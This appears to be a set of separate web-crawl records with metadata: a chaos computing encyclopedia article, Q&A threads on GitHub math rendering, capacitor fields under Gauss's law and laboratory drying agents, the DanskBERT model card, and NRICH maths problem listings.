# Chaos computing Chaos computing is the idea of using chaotic systems for computation. In particular, chaotic systems can be made to produce all types of logic gates and further allow them to be morphed into each other. ## Introduction Chaotic systems generate large numbers of patterns of behavior and are irregular because they switch between these patterns. They exhibit sensitivity to initial conditions which, in practice, means that chaotic systems can switch between patterns extremely fast. Modern digital computers perform computations based upon digital logic operations implemented at the lowest level as logic gates. There are essentially seven basic logic functions implemented as logic gates: AND, OR, NOT, NAND, NOR, XOR and XNOR. A chaotic morphing logic gate consists of a generic nonlinear circuit that exhibits chaotic dynamics producing various patterns. A control mechanism is used to select patterns that correspond to different logic gates. The sensitivity to initial conditions is used to switch between different patterns extremely fast (well under a computer clock cycle). ## Chaotic Morphing As an example of how chaotic morphing works, consider a generic chaotic system known as the Logistic map. This nonlinear map is very well studied for its chaotic behavior and its functional representation is given by: ${\displaystyle \qquad x_{n+1}=rx_{n}(1-x_{n})}$ In this case, the value of x is chaotic when r >~ 3.57... and rapidly switches between different patterns in the value of x as one iterates the value of n. A simple threshold controller can control or direct the chaotic map or system to produce one of many patterns. The controller basically sets a threshold on the map such that if the iteration ("chaotic update") of the map takes on a value of x that lies above a given threshold value, x*,then the output corresponds to a 1, otherwise it corresponds to a 0. One can then reverse engineer the chaotic map to establish a lookup table of thresholds that robustly produce any of the logic gate operations.[1][2][3] Since the system is chaotic, we can then switch between various gates ("patterns") exponentially fast. ## ChaoGate The ChaoGate is an implementation of a chaotic morphing logic gate developed by the inventor of the technology William Ditto, along with Sudeshna Sinha and K. Murali.[4][5] A Chaotic computer, made up of a lattice of ChaoGates, has been demonstrated by Chaologix Inc. ## Research Recent research has shown how chaotic computers can be recruited in Fault Tolerant applications, by introduction of dynamic based fault detection methods.[6] Also it has been demonstrated that multidimensional dynamical states available in a single ChaoGate can be exploited to implement parallel chaos computing,[7][8] and as an example, this parallel architecture can lead to constructing an SR like memory element through one ChaoGate.[7] As another example, it has been proved that any logic function can be constructed directly from just one ChaoGate.[9] ## References 1. ^ Sudeshna Sinha and William L. Ditto, "Dynamics Based Computation", Physical Review Letters, vol. 81 (1998) pp. 2156-2159 2. ^ Sudeshna Sinha and William L. Ditto, "Computing with Distributed Chaos", Physical Review E, vol. 60 (1999) pp. 363-377. 3. ^ Toshinori Munakata, Sudeshna Sinha and William L. Ditto, "Chaos Computing: Implementation of Fundamental Logical and Arithmetic Operations and Memory by Chaotic Elements", IEEE Transactions on Circuits and Systems, vol. 49 (2002) pp. 1629-1633. 4. ^ Matthew Finnegan (16 Nov 2010). "Scientists use chaos theory to create new chip Chaogate holds exciting processing prospects". TechEYE.net. Retrieved October 15, 2012. 5. ^ "Method and apparatus for a chaotic computing module," W. Ditto, S. Sinha and K. Murali, US Patent Number 07096347 (August 22, 2006). U.S. Patent 8,520,191 6. ^ "Fault tolerance and detection in chaotic Computers" M.R. Jahed-Motlagh, B. Kia, W.L. Ditto and S. Sinha, International Journal of Bifurcation and Chaos 17, 1955-1968(2007) 7. ^ a b "Chaos-based computation via Chua's circuit: parallel computing with application to the SR flip-flop"D. Cafagna, G. Grassi, International Symposium on Signals, Circuits and Systems, ISSCS 2005, Volume: 2, 749-752 (2005) 8. ^ "Parallel computing with extended dynamical systems" S. Sinha, T. Munakata and W.L. Ditto Physical Review E, 65 036214 [1-7](2002) 9. ^ "Reconfigurable logic blocks Based on a chaotic Chua circuit," H. R. Pourshaghaghi, B. Kia, W. Ditto and M. R. Jahed-Motlagh, to be published in CHAOS, SOLITONS & FRACTALS • "The 10 Coolest Technologies You’ve Never Heard Of – Chaos Computing," PC Magazine, Vol. 25, No. 13, page p. 66, August 8, 2006. [1] • "Logic from Chaos," MIT Technology Review, June 15, 2006. [2] • "Exploiting the controlled responses of chaotic elements to design configurable hardware," W. L. Ditto and S. Sinha, Philosophical Transactions of the Royal Society London A, 364, pp. 2483–2494 (2006) doi:10.1098/rsta.2006.1836. • "Chaos Computing: ideas and implementations" William L. Ditto, K. Murali and S. Sinha, Philosophical Transactions of the Royal Society London A, (2007) doi:10.1098/rsta.2007.2116. • "Experimental realization of the fundamental NOR Gate using a chaotic circuit," K. Murali, Sudeshna Sinha and William L. Ditto Phys. Rev. E 68, 016205 (2003). doi:10.1103/PhysRevE.68.016205 • "Implementation of NOR gate by a chaotic Chua’s circuit," K. Murali, Sudeshna Sinha and William L. Ditto, Int. J. of Bifurcation and Chaos, Vol. 13, No. 9, pp. 1–4, (2003). doi:10.1142/S0218127403008053 • "Fault tolerance and detection in chaotic Computers" M.R. Jahed-Motlagh, B. Kia, W.L. Ditto and S. Sinha, International Journal of Bifurcation and Chaos 17, 1955-1968(2007)doi:10.1142/S0218127407018142 • "Chaos-based computation via Chua's circuit: parallel computing with application to the SR flip-flop"D. Cafagna, G. Grassi, International Symposium on Signals, Circuits and Systems, ISSCS 2005, Volume: 2, 749-752 (2005) doi:10.1109/ISSCS.2005.1511349 • "Parallel computing with extended dynamical systems" S. Sinha, T. Munakata and W.L. Ditto; Physical Review E, 65 036214 [1-7](2002) doi:10.1103/PhysRevE.65.036214 • "Reconfigurable logic blocks Based on a chaotic Chua circuit," H. R. Pourshaghaghi, B. Kia, W. Ditto and M. R. Jahed-Motlagh, to be published in CHAOS, SOLITONS & FRACTALS doi:10.1016/j.chaos.2007.11.030
2017-06-26 08:22:40
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 1, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5346319675445557, "perplexity": 4409.573428318672}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-26/segments/1498128320685.63/warc/CC-MAIN-20170626064746-20170626084746-00157.warc.gz"}
https://stackoverflow.com/questions/12502440/markdown-formula-display-in-github
# Markdown formula display in GitHub When I write an R markdown file in RStudio and Knit HTML, my formulas (inline using $..$ or display using $$..$$) can be displayed properly. However, when I push my .md file to GitHub, these formulas cannot be displayed. They only show $..$ and $$..$$. Is there a way to let GitHub know how to parse latex formulas? Thanks! • No. Github does not support Mathjax, except in their Wikis. The only alternative is to generate your HTML locally using jekyll and pushing it to github. – Ramnath Sep 19 '12 at 20:46 • @Ramnath: thanks! – alittleboy Sep 19 '12 at 20:58 Is there a way to let GitHub know how to parse latex formulas? Some sites provide users with a service that would fit your need without any javascript involved: on-the-fly generation of images from url encoded latex formulas. given the following markdown syntax ![equation](https://latex.codecogs.com/gif.latex?1%2Bsin%28mc%5E2%29%0D%0A) it will display the following image $1+sin(mc^2)$ Note: In order for the image to be properly displayed, you'll have to ensure the querystring part of the url is percent encoded. You can easily find online tools to help you with that task, such as www.url-encode-decode.com • Thanks! I tried it in mdcharm, seems to work without urlencoding. – laike9m Nov 27 '13 at 5:56 • By using svg.latex in the link, you get a nice SVG image file. – Dylan Richard Muir Feb 21 '17 at 13:11 I also looked for how to render math on GitHub pages, and after a long time of research I found a nice solution. I used KateX to render formulas server side: it is really faster than MathJaX. Please note that same solution could be arranged to work also client side, but, I prefer server side rendering, cause 1. you know your server environment, but you don't know the client environment of your visitors 2. it is also faster client side, if the formulas are rendered on the server, only once. I wrote an article showing the steps, I hope it can help math divulgation: see Math on GitHub Pages.
2018-08-19 00:03:06
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 1, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.5839380025863647, "perplexity": 2233.3566775131144}, "config": {"markdown_headings": true, "markdown_code": false, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 5, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-34/segments/1534221213903.82/warc/CC-MAIN-20180818232623-20180819012623-00348.warc.gz"}
https://physics.stackexchange.com/questions/110480/field-between-the-plates-of-a-parallel-plate-capacitor-using-gausss-law
Field between the plates of a parallel plate capacitor using Gauss's Law Consider the following parallel plate capacitor made of two plates with equal area $A$ and equal surface charge density $\sigma$: The electric field due to the positive plate is $$\frac{\sigma}{\epsilon_0}$$ And the magnitude of the electric field due to the negative plate is the same. These fields will add in between the capacitor giving a net field of: $$2\frac{\sigma}{\epsilon_0}$$ If we try getting the resultant field using Gauss's Law, enclosing the plate in a Gaussian surface as shown, there is flux only through the face parallel to the positive plate and outside it (since the other face is in the conductor and the electric field skims all other faces). $$\Phi = \oint \vec{E}\cdot\vec{dA} = EA$$ where $E$ is the electric field between the capacitor plates. From Gauss's Law this is equal to the charge $Q$ on the plates divided by $\epsilon_0$ $$\frac{Q}{\epsilon_0}\implies E = \frac{Q}{A\epsilon_0} = \frac{\sigma}{\epsilon_0}$$ I know there is something fundamentally incorrect in my assumptions or understanding, because I frequently get conflicting results when calculating electric fields using Gauss's Law. I am, however, unsuccessful in identifying this. Edit: Also, another problem I noticed was that even if we remove the negative plate from the capacitor and then apply Gauss's Law in the same manner, the field still comes out to be $\sigma/\epsilon_0$ which is clearly wrong since the negative plate contributes to the field. So, maybe the problem is in the application of Gauss's Law. • The problem is your first equation there, it should be σ/2ϵ. You can derive this using Gauss. Nov 25, 2015 at 11:39 This is an extremely common mistake in introductory EM - from students who actually spend time thinking about the problem, anyway ;-) Use Gauss's law in both cases: In the case of infinite plates, you do not have the result you give first. A Gaussian cylinder has two disks on either side of the plate, so $$E_1(2A)=\frac{\sigma A}{\epsilon_0}\rightarrow E_1=\frac{\sigma}{2\epsilon_0}$$ And from superposition you get the total electric field $$E=\frac{\sigma}{\epsilon_0}$$ You second case is correct, but the charge enclosed by your surface is $Q/2$ relative to the first case (conservation of charge, if you want the same answer you better have the same total charge on the plates), so $$E_1A=\frac{(\sigma/2) A}{\epsilon_0}\rightarrow E_1=\frac{\sigma}{2\epsilon_0}$$ Which again gets you the same answer when you apply superposition. Consider first a single infinite conducting plate. In order to apply Gauss's law with one end of a cylinder inside of the conductor, you must assume that the conductor has some finite thickness. In doing this, the surface charge density $\sigma$ must be spread over both sides (think of this as a finite plate with a small thickness and then stretch it out to infinity. Using Gauss's law with this plate (either putting one end of the cylinder in the conductor or one end on both sides) gives a result of $E = \frac{\sigma}{\epsilon_{0}}=\frac{Q}{2A\epsilon_0}$. Now imagine bringing the second plate, with opposite charge density $-\sigma$ in from infinity. Because these plates are conductors, charges in each plate will move around to cancel the field from the opposite plate inside of the conductor (remember $E = 0$ inside of a conductor). Because the electric field produced by each plate is constant, this can be accomplished in the conductor with the net positive charge by moving a charge density of $+\sigma$ to the side of the plate facing the negatively charged plate, and $-\sigma$ to the other side. The opposite will be done in the negatively charged plate. One can now apply Gauss's law with a cylinder around the positive plate to find $E = \frac{2\sigma}{\epsilon_{0}}=\frac{Q}{A\epsilon_{0}}$. This is consistent with adding the electric field produced by each of the plates individually. If you look carefully at he electric fields in the figure you have drawn above, then you will see the electric field inside the conductor is indeed nonzero. To keep the electric field inside the conducting plates zero, one must take into account these induced charges. It is also now obvious that the electric field depends on the negatively charged plate. If the charge on this plate were changed, or removed completely, then the induced charge on the positive plate would clearly change, with a resulting change in the electric field. • Hi, is it also possible to solve this without Gauss's law, using the continuous superposition integral? Dec 16, 2017 at 7:21 • @JDoeDoe: Yes, certainly. You'd have an integral over the entire surface of the plate, which would have infinite limits, and the electric field contribution would be something like 1/(x^2+y^2+d^2) dx dy for a distance d above the plate. And you'd have to work out the vector contributions of course as well. Feb 10, 2019 at 18:54 • Very nice answer! Apr 2, 2020 at 23:00 • Hi, I wonder if we should take the induced charge into account when calculating the electric field by superposition. If we isolate the positive plate without changing its charge distribution, then the electric field due to it alone is E+ = Q/Aε0 (twice that of a conducting plate due to the induced charge). Similarly, the electric field due to the negative plate is E- = Q/Aε0 as well. Thus, the two can add up to give a total electric field E = 2Q/Aε0, which is clearly incorrect. May 12 at 20:45 In a capacitor, the plates are only charged at the interface facing the other plate. That is because the "right" way to see this problem is as a polarized piece of metal where the two polarized parts are put facing one another. In principle, each charge density generates a field which is $\sigma/2 \epsilon$. It is just that the actual geometry of the plate capacitor is such that these fields add up in the slab region and vanish outside which explains the result you find with Gauss' law. Remember that Gauss' law tells you the total electric field and not the one only due to the charge you are surrounding. That is because, when using Gauss' law, you also uses some boundary conditions. In your calculation this total field thing comes from the fact that you put in by hands that the field had to be zero in the plates. To illustrate that, let us compute the case of a single plate in the universe and then that of two plates. If you have a single plate in the universe, the plate is a plane of symmetry and you have $E(0_+) = -E(0_-)$ which gives rise when you use Gauss's theorem to $E = \text{sgn}(x)\frac{\sigma}{2\epsilon}$ where $\text{sgn}(x)$ is the sign of the $x$ variable. When you have a capacitor, the left plate for instance is not a plane of symmetry anymore and you have that $E(0_+) \neq -E(0_-)$. By applying Gauss's theorem inside the capacitor slab, you will find that the electric field is uniform there with a value $E_{int}$ and by applying it outside, you will see that it is uniform as well and takes the values $E_{ext}^{(1)}$ when $x < 0$ and $E_{ext}^{(2)}$ when $x > L$. We then apply Gauss's theorem one last time on each plate to find that $E_{int}-E_{ext}^{(1)} = \frac{\sigma}{\epsilon}$ and $E_{ext}^{(2)} - E_{int} = -\frac{\sigma}{\epsilon}$. We have here two equations and three unknowns. Adding these two equations will yield $E_{ext}^{(1)} = E_{ext}^{(2)}= E_{ext}$ and substracting them gives $E_{int} = \frac{\sigma}{\epsilon} + E_{ext}$. Here I did not use the fact that it was an actual capacitor with metallic plates, I just imagined infinite sheets of opposite charge facing each other. It is thus normal to find that the general solution can be the sum of any external field + the one created by these sheets. Imagining a case where the external field is zero or the fact that there are actually metallic plates in the system gives the usual result that the field is $\frac{\sigma}{\epsilon}$ inside and zero outside. • I can't figure out from your answer where I went wrong. Could you elaborate? Apr 29, 2014 at 13:36 • I have developed a bit my point and realized it wasn't as trivial as I expected in the general case. In any case, my point is that from the Gauss's theorem point of view these two cases are not the same. Apr 29, 2014 at 15:02 • "Remember that Gauss' law tells you the total electric field and not the one only due to the charge you are surrounding." Hm, that doesn't seem right. Nov 25, 2015 at 11:36 • @Elliot: could you specify what does seem right or doesn't? Nov 25, 2015 at 19:20
2022-06-26 12:23:11
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.8111923933029175, "perplexity": 171.37245259393302}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-27/segments/1656103205617.12/warc/CC-MAIN-20220626101442-20220626131442-00527.warc.gz"}
https://chemistry.stackexchange.com/questions/138429/can-i-use-calcium-chloride-instead-of-sodium-sulfate-as-drying-agent
# Can I use calcium chloride instead of sodium sulfate as drying agent? In the synthesis of N-ethoxycarbonyl L-proline methyl ester from L-proline and ethyl chloroformate, I dry the organic phase over sodium sulfate. Can I use calcium chloride instead of sodium sulfate? I searched for information and I found that calcium chloride can contain basic impurities such as $$\ce{Ca(OH)2}$$ and $$\ce{CaCl(OH)}$$. Does someone know if it is actually the case? If it would be correct I think that it cannot be used because the impurities can hydrolyse the ester. • Why you want to change the drying reagent? – Mathew Mahindaratne Aug 4 '20 at 15:58 Similar to @MathewMahindaratne's comment: if you know the drying agent suits your needs well enough, keep it. In particular here, sodium sulfate is a neuter one (as is calcium sulfate, too) is a safe option because while drying the organic layer, the agent will neither protonate, nor deprotonate your product. Thus, if the protocol states $$\ce{Na2SO4}$$, stick to it. This is in contrast to calcium chloride which not only will contain traces of calcium hydroxyde when taken from the jar, but upon contact with additional water (a.k.a. while drying your organic solution) will create new $$\ce{Ca(OH)2}$$ and thus is considered a basic (and potentially deprotonating) drying agent. Note, $$\ce{MgSO4}$$ is considered as an acidic drying agent. Using the wrong salt solutions or drying agents during the workup actually may cleave off (e.g., protecting) groups and thus complicate the isolation and purification of your product.
2021-04-14 11:46:56
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 5, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.902206540107727, "perplexity": 3328.8701831315075}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2021-17/segments/1618038077810.20/warc/CC-MAIN-20210414095300-20210414125300-00130.warc.gz"}
https://qsimfp.org/feedback/add
# Give us some feedback • Enter a few-word description of the feedback • Enter a the feedback description here
2022-05-20 13:15:55
{"extraction_info": {"found_math": false, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9682134985923767, "perplexity": 8777.902250414361}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2022-21/segments/1652662532032.9/warc/CC-MAIN-20220520124557-20220520154557-00720.warc.gz"}
https://huggingface.co/vesteinn/DanskBERT
# DanskBERT This is DanskBERT, a Danish language model. Note that you should not prepend the mask with a space when using it directly! The model is the best performing base-size model on the ScandEval benchmark for Danish. DanskBERT was trained on the Danish Gigaword Corpus (Strømberg-Derczynski et al., 2021). DanskBERT was trained using fairseq using the RoBERTa-base configuration. The model was trained with a batch size of 2k, and was trained to convergence for 500k steps using 16 V100 cards for approximately two weeks. If you find this model useful, please cite @inproceedings{snaebjarnarson-etal-2023-transfer, title = "{T}ransfer to a Low-Resource Language via Close Relatives: The Case Study on Faroese", author = "Snæbjarnarson, Vésteinn and Simonsen, Annika and Glavaš, Goran and Vulić, Ivan", booktitle = "Proceedings of the 24th Nordic Conference on Computational Linguistics (NoDaLiDa)", month = "may 22--24", year = "2023", Mask token: <mask>
2023-03-24 00:05:02
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.18140976130962372, "perplexity": 11495.164076705745}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296945218.30/warc/CC-MAIN-20230323225049-20230324015049-00778.warc.gz"}
http://nrich.maths.org/public/leg.php?code=71&cl=4&cldcmpid=4781
Search by Topic Resources tagged with Mathematical reasoning & proof similar to The Harmonic Triangle and Pascal's Triangle: Filter by: Content type: Stage: Challenge level: There are 182 results Broad Topics > Using, Applying and Reasoning about Mathematics > Mathematical reasoning & proof Symmetric Tangles Stage: 4 The tangles created by the twists and turns of the Conway rope trick are surprisingly symmetrical. Here's why! N000ughty Thoughts Stage: 4 Challenge Level: How many noughts are at the end of these giant numbers? There's a Limit Stage: 4 and 5 Challenge Level: Explore the continued fraction: 2+3/(2+3/(2+3/2+...)) What do you notice when successive terms are taken? What happens to the terms if the fraction goes on indefinitely? And So on - and on -and On Stage: 5 Challenge Level: Can you find the value of this function involving algebraic fractions for x=2000? Continued Fractions II Stage: 5 In this article we show that every whole number can be written as a continued fraction of the form k/(1+k/(1+k/...)). The Golden Ratio, Fibonacci Numbers and Continued Fractions. Stage: 4 An iterative method for finding the value of the Golden Ratio with explanations of how this involves the ratios of Fibonacci numbers and continued fractions. Knight Defeated Stage: 4 Challenge Level: The knight's move on a chess board is 2 steps in one direction and one step in the other direction. Prove that a knight cannot visit every square on the board once and only (a tour) on a 2 by n board. . . . Big, Bigger, Biggest Stage: 5 Challenge Level: Which is the biggest and which the smallest of $2000^{2002}, 2001^{2001} \text{and } 2002^{2000}$? Archimedes and Numerical Roots Stage: 4 Challenge Level: The problem is how did Archimedes calculate the lengths of the sides of the polygons which needed him to be able to calculate square roots? Cube Net Stage: 5 Challenge Level: How many tours visit each vertex of a cube once and only once? How many return to the starting point? Stage: 4 Challenge Level: Four jewellers share their stock. Can you work out the relative values of their gems? Picture Story Stage: 4 Challenge Level: Can you see how this picture illustrates the formula for the sum of the first six cube numbers? Ordered Sums Stage: 4 Challenge Level: Let a(n) be the number of ways of expressing the integer n as an ordered sum of 1's and 2's. Let b(n) be the number of ways of expressing n as an ordered sum of integers greater than 1. (i) Calculate. . . . Proof Sorter - Geometric Series Stage: 5 Challenge Level: This is an interactivity in which you have to sort into the correct order the steps in the proof of the formula for the sum of a geometric series. Water Pistols Stage: 5 Challenge Level: With n people anywhere in a field each shoots a water pistol at the nearest person. In general who gets wet? What difference does it make if n is odd or even? Tree Graphs Stage: 5 Challenge Level: A connected graph is a graph in which we can get from any vertex to any other by travelling along the edges. A tree is a connected graph with no closed circuits (or loops. Prove that every tree has. . . . Transitivity Stage: 5 Suppose A always beats B and B always beats C, then would you expect A to beat C? Not always! What seems obvious is not always true. Results always need to be proved in mathematics. Magic W Wrap Up Stage: 5 Challenge Level: Prove that you cannot form a Magic W with a total of 12 or less or with a with a total of 18 or more. Particularly General Stage: 5 Challenge Level: By proving these particular identities, prove the existence of general cases. Russian Cubes Stage: 4 Challenge Level: I want some cubes painted with three blue faces and three red faces. How many different cubes can be painted like that? Doodles Stage: 4 Challenge Level: Draw a 'doodle' - a closed intersecting curve drawn without taking pencil from paper. What can you prove about the intersections? Areas and Ratios Stage: 4 Challenge Level: What is the area of the quadrilateral APOQ? Working on the building blocks will give you some insights that may help you to work it out. Postage Stage: 4 Challenge Level: The country Sixtania prints postage stamps with only three values 6 lucres, 10 lucres and 15 lucres (where the currency is in lucres).Which values cannot be made up with combinations of these postage. . . . Telescoping Functions Stage: 5 Take a complicated fraction with the product of five quartics top and bottom and reduce this to a whole number. This is a numerical example involving some clever algebra. Proofs with Pictures Stage: 5 Some diagrammatic 'proofs' of algebraic identities and inequalities. Euler's Formula and Topology Stage: 5 Here is a proof of Euler's formula in the plane and on a sphere together with projects to explore cases of the formula for a polygon with holes, for the torus and other solids with holes and the. . . . The Triangle Game Stage: 3 and 4 Challenge Level: Can you discover whether this is a fair game? Whole Number Dynamics II Stage: 4 and 5 This article extends the discussions in "Whole number dynamics I". Continuing the proof that, for all starting points, the Happy Number sequence goes into a loop or homes in on a fixed point. Whole Number Dynamics I Stage: 4 and 5 The first of five articles concentrating on whole number dynamics, ideas of general dynamical systems are introduced and seen in concrete cases. A Computer Program to Find Magic Squares Stage: 5 This follows up the 'magic Squares for Special Occasions' article which tells you you to create a 4by4 magicsquare with a special date on the top line using no negative numbers and no repeats. Yih or Luk Tsut K'i or Three Men's Morris Stage: 3, 4 and 5 Challenge Level: Some puzzles requiring no knowledge of knot theory, just a careful inspection of the patterns. A glimpse of the classification of knots and a little about prime knots, crossing numbers and. . . . Pythagorean Triples II Stage: 3 and 4 This is the second article on right-angled triangles whose edge lengths are whole numbers. Square Pair Circles Stage: 5 Challenge Level: Investigate the number of points with integer coordinates on circles with centres at the origin for which the square of the radius is a power of 5. Number Rules - OK Stage: 4 Challenge Level: Can you convince me of each of the following: If a square number is multiplied by a square number the product is ALWAYS a square number... Mediant Stage: 4 Challenge Level: If you take two tests and get a marks out of a maximum b in the first and c marks out of d in the second, does the mediant (a+c)/(b+d)lie between the results for the two tests separately. Mouhefanggai Stage: 4 Imagine two identical cylindrical pipes meeting at right angles and think about the shape of the space which belongs to both pipes. Early Chinese mathematicians call this shape the mouhefanggai. Where Do We Get Our Feet Wet? Stage: 5 Professor Korner has generously supported school mathematics for more than 30 years and has been a good friend to NRICH since it started. Fractional Calculus III Stage: 5 Fractional calculus is a generalisation of ordinary calculus where you can differentiate n times when n is not a whole number. Whole Number Dynamics III Stage: 4 and 5 In this third of five articles we prove that whatever whole number we start with for the Happy Number sequence we will always end up with some set of numbers being repeated over and over again. Magic Squares II Stage: 4 and 5 An article which gives an account of some properties of magic squares. More Sums of Squares Stage: 5 Tom writes about expressing numbers as the sums of three squares. Similarly So Stage: 4 Challenge Level: ABCD is a square. P is the midpoint of AB and is joined to C. A line from D perpendicular to PC meets the line at the point Q. Prove AQ = AD. Sums of Squares and Sums of Cubes Stage: 5 An account of methods for finding whether or not a number can be written as the sum of two or more squares or as the sum of two or more cubes. Modulus Arithmetic and a Solution to Differences Stage: 5 Peter Zimmerman, a Year 13 student at Mill Hill County High School in Barnet, London wrote this account of modulus arithmetic. Whole Number Dynamics V Stage: 4 and 5 The final of five articles which containe the proof of why the sequence introduced in article IV either reaches the fixed point 0 or the sequence enters a repeating cycle of four values. Modulus Arithmetic and a Solution to Dirisibly Yours Stage: 5 Peter Zimmerman from Mill Hill County High School in Barnet, London gives a neat proof that: 5^(2n+1) + 11^(2n+1) + 17^(2n+1) is divisible by 33 for every non negative integer n. Whole Number Dynamics IV Stage: 4 and 5 Start with any whole number N, write N as a multiple of 10 plus a remainder R and produce a new whole number N'. Repeat. What happens? A Knight's Journey Stage: 4 and 5 This article looks at knight's moves on a chess board and introduces you to the idea of vectors and vector addition. Impossible Sandwiches Stage: 3, 4 and 5 In this 7-sandwich: 7 1 3 1 6 4 3 5 7 2 4 6 2 5 there are 7 numbers between the 7s, 6 between the 6s etc. The article shows which values of n can make n-sandwiches and which cannot.
2017-04-23 14:05:04
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.3598952889442444, "perplexity": 1230.7285626385187}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-17/segments/1492917118707.23/warc/CC-MAIN-20170423031158-00124-ip-10-145-167-34.ec2.internal.warc.gz"}
